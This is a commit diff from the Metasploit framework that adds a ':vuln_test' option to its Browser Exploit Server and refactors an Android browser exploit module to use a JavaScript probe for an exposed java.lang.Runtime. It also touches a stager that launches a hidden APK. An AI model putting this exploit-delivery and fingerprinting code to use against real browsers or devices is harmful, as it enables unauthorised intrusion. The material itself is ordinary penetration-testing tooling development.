Land #3934 - New :vuln_test option to BES
commit
6d7870a4ac
|
@ -89,8 +89,8 @@ module Exploit::Android
|
|||
|
||||
# The NDK stager is used to launch a hidden APK
|
||||
def ndkstager(stagename, arch)
|
||||
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
|
||||
data = File.read(localfile, :mode => 'rb')
|
||||
path = ['data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so']
|
||||
data = File.read(File.join(Msf::Config::InstallRoot, *path), :mode => 'rb')
|
||||
data.gsub!('PLOAD', stagename)
|
||||
end
|
||||
|
||||
|
|
|
@ -3,6 +3,7 @@
|
|||
require 'erb'
|
||||
require 'cgi'
|
||||
require 'date'
|
||||
require 'set'
|
||||
require 'rex/exploitation/js'
|
||||
require 'msf/core/exploit/jsobfu'
|
||||
|
||||
|
@ -23,8 +24,7 @@ module Msf
|
|||
# this must be static between runs, otherwise the older cookies will be ignored
|
||||
DEFAULT_COOKIE_NAME = '__ua'
|
||||
|
||||
PROXY_REQUEST_HEADER_SET = Set.new(
|
||||
%w{
|
||||
PROXY_REQUEST_HEADER_SET = Set.new(%w{
|
||||
CLIENT_IP
|
||||
FORWARDED
|
||||
FORWARDED_FOR
|
||||
|
@ -43,23 +43,24 @@ module Msf
|
|||
})
|
||||
|
||||
# Requirements a browser module can define in either BrowserRequirements or in targets
|
||||
REQUIREMENT_KEY_SET = {
|
||||
:source => 'source', # Either 'script' or 'headers'
|
||||
:ua_name => 'ua_name', # Example: MSIE
|
||||
:ua_ver => 'ua_ver', # Example: 8.0, 9.0
|
||||
:os_name => 'os_name', # Example: Microsoft Windows
|
||||
:os_flavor => 'os_flavor', # Example: XP, 7
|
||||
:language => 'language', # Example: en-us
|
||||
:arch => 'arch', # Example: x86
|
||||
:proxy => 'proxy', # 'true' or 'false'
|
||||
:silverlight => 'silverlight', # 'true' or 'false'
|
||||
:office => 'office', # Example: "2007", "2010"
|
||||
:java => 'java', # Example: 1.6, 1.6.0.0
|
||||
:clsid => 'clsid', # ActiveX clsid. Also requires the :method key
|
||||
:method => 'method', # ActiveX method. Also requires the :clsid key
|
||||
:mshtml_build => 'mshtml_build', # mshtml build. Example: "65535"
|
||||
:flash => 'flash' # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
|
||||
}
|
||||
REQUIREMENT_KEY_SET = Set.new([
|
||||
:source, # Either 'script' or 'headers'
|
||||
:ua_name, # Example: MSIE
|
||||
:ua_ver, # Example: 8.0, 9.0
|
||||
:os_name, # Example: Microsoft Windows
|
||||
:os_flavor, # Example: XP, 7
|
||||
:language, # Example: en-us
|
||||
:arch, # Example: x86
|
||||
:proxy, # 'true' or 'false'
|
||||
:silverlight, # 'true' or 'false'
|
||||
:office, # Example: "2007", "2010"
|
||||
:java, # Example: 1.6, 1.6.0.0
|
||||
:clsid, # ActiveX clsid. Also requires the :method key
|
||||
:method, # ActiveX method. Also requires the :clsid key
|
||||
:mshtml_build, # mshtml build. Example: "65535"
|
||||
:flash, # Example: "12.0" (chrome/ff) or "12.0.0.77" (IE)
|
||||
:vuln_test # Example: "if(window.MyComponentIsInstalled)return true;"
|
||||
])
|
||||
|
||||
def initialize(info={})
|
||||
super
|
||||
|
@ -129,7 +130,7 @@ module Msf
|
|||
# @return [Hash] A hash of requirements
|
||||
#
|
||||
def extract_requirements(reqs)
|
||||
tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.has_key?(k.to_sym)}
|
||||
tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.include?(k.to_sym)}
|
||||
# Make sure keys are always symbols
|
||||
Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
|
||||
end
|
||||
|
@ -189,9 +190,12 @@ module Msf
|
|||
# Special keys to ignore because the script registers this as [:activex] = true or false
|
||||
next if k == :clsid or k == :method
|
||||
|
||||
vprint_debug("Comparing requirement: #{k}=#{v} vs k=#{profile[k.to_sym]}")
|
||||
expected = k != :vuln_test ? v : 'true'
|
||||
vprint_debug("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k.to_sym]}")
|
||||
|
||||
if v.is_a? Regexp
|
||||
if k == :vuln_test
|
||||
bad_reqs << k unless profile[k.to_sym].to_s == 'true'
|
||||
elsif v.is_a? Regexp
|
||||
bad_reqs << k if profile[k.to_sym] !~ v
|
||||
elsif v.is_a? Proc
|
||||
bad_reqs << k unless v.call(profile[k.to_sym])
|
||||
|
@ -375,19 +379,20 @@ module Msf
|
|||
window.onload = function() {
|
||||
var osInfo = os_detect.getVersion();
|
||||
var d = {
|
||||
"<%=REQUIREMENT_KEY_SET[:os_name]%>" : osInfo.os_name,
|
||||
"<%=REQUIREMENT_KEY_SET[:os_flavor]%>" : osInfo.os_flavor,
|
||||
"<%=REQUIREMENT_KEY_SET[:ua_name]%>" : osInfo.ua_name,
|
||||
"<%=REQUIREMENT_KEY_SET[:ua_ver]%>" : osInfo.ua_version,
|
||||
"<%=REQUIREMENT_KEY_SET[:arch]%>" : osInfo.arch,
|
||||
"<%=REQUIREMENT_KEY_SET[:java]%>" : misc_addons_detect.getJavaVersion(),
|
||||
"<%=REQUIREMENT_KEY_SET[:silverlight]%>" : misc_addons_detect.hasSilverlight(),
|
||||
"<%=REQUIREMENT_KEY_SET[:flash]%>" : misc_addons_detect.getFlashVersion()
|
||||
"os_name" : osInfo.os_name,
|
||||
"os_flavor" : osInfo.os_flavor,
|
||||
"ua_name" : osInfo.ua_name,
|
||||
"ua_ver" : osInfo.ua_version,
|
||||
"arch" : osInfo.arch,
|
||||
"java" : misc_addons_detect.getJavaVersion(),
|
||||
"silverlight" : misc_addons_detect.hasSilverlight(),
|
||||
"flash" : misc_addons_detect.getFlashVersion(),
|
||||
"vuln_test" : <%= js_vuln_test %>
|
||||
};
|
||||
|
||||
<% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
|
||||
d['<%=REQUIREMENT_KEY_SET[:office]%>'] = ie_addons_detect.getMsOfficeVersion();
|
||||
d['<%=REQUIREMENT_KEY_SET[:mshtml_build]%>'] = ScriptEngineBuildVersion().toString();
|
||||
d['office'] = ie_addons_detect.getMsOfficeVersion();
|
||||
d['mshtml_build'] = ScriptEngineBuildVersion().toString();
|
||||
<%
|
||||
clsid = @requirements[:clsid]
|
||||
method = @requirements[:method]
|
||||
|
@ -497,6 +502,12 @@ module Msf
|
|||
method(:on_request_exploit).call(cli, request, profile)
|
||||
else
|
||||
print_warning("Exploit requirement(s) not met: #{bad_reqs * ', '}. For more info: http://r-7.co/PVbcgx")
|
||||
if bad_reqs.include?(:vuln_test)
|
||||
error_string = (self.module_info['BrowserRequirements'] || {})[:vuln_test_error]
|
||||
if error_string.present?
|
||||
print_warning(error_string)
|
||||
end
|
||||
end
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
|
@ -555,5 +566,16 @@ module Msf
|
|||
regenerate_payload(cli, platform, arch).encoded
|
||||
end
|
||||
|
||||
# @return [String] custom Javascript to check if a vulnerability is present
|
||||
def js_vuln_test
|
||||
all_reqs = self.module_info['BrowserRequirements'] || {}
|
||||
if all_reqs[:vuln_test].present?
|
||||
code = all_reqs[:vuln_test] + ';return !!this.is_vuln;'
|
||||
'Function(('+JSON.generate(:code => code)+').code)()'
|
||||
else
|
||||
'true'
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -12,11 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
include Msf::Exploit::Android
|
||||
|
||||
autopwn_info(
|
||||
:os_flavor => 'Android',
|
||||
:javascript => true,
|
||||
:rank => ExcellentRanking,
|
||||
:vuln_test => %Q|
|
||||
VULN_CHECK_JS = %Q|
|
||||
for (i in top) {
|
||||
try {
|
||||
top[i].getClass().forName('java.lang.Runtime');
|
||||
|
@ -24,6 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
} catch(e) {}
|
||||
}
|
||||
|
|
||||
|
||||
autopwn_info(
|
||||
:os_flavor => 'Android',
|
||||
:javascript => true,
|
||||
:rank => ExcellentRanking,
|
||||
:vuln_test => VULN_CHECK_JS
|
||||
)
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -71,7 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'BrowserRequirements' => {
|
||||
:source => 'script',
|
||||
:os_flavor => 'Android'
|
||||
:os_flavor => 'Android',
|
||||
:vuln_test => VULN_CHECK_JS,
|
||||
:vuln_test_error => 'No vulnerable Java objects were found in this web context.'
|
||||
}
|
||||
))
|
||||
|
||||
|
|
Loading…
Reference in New Issue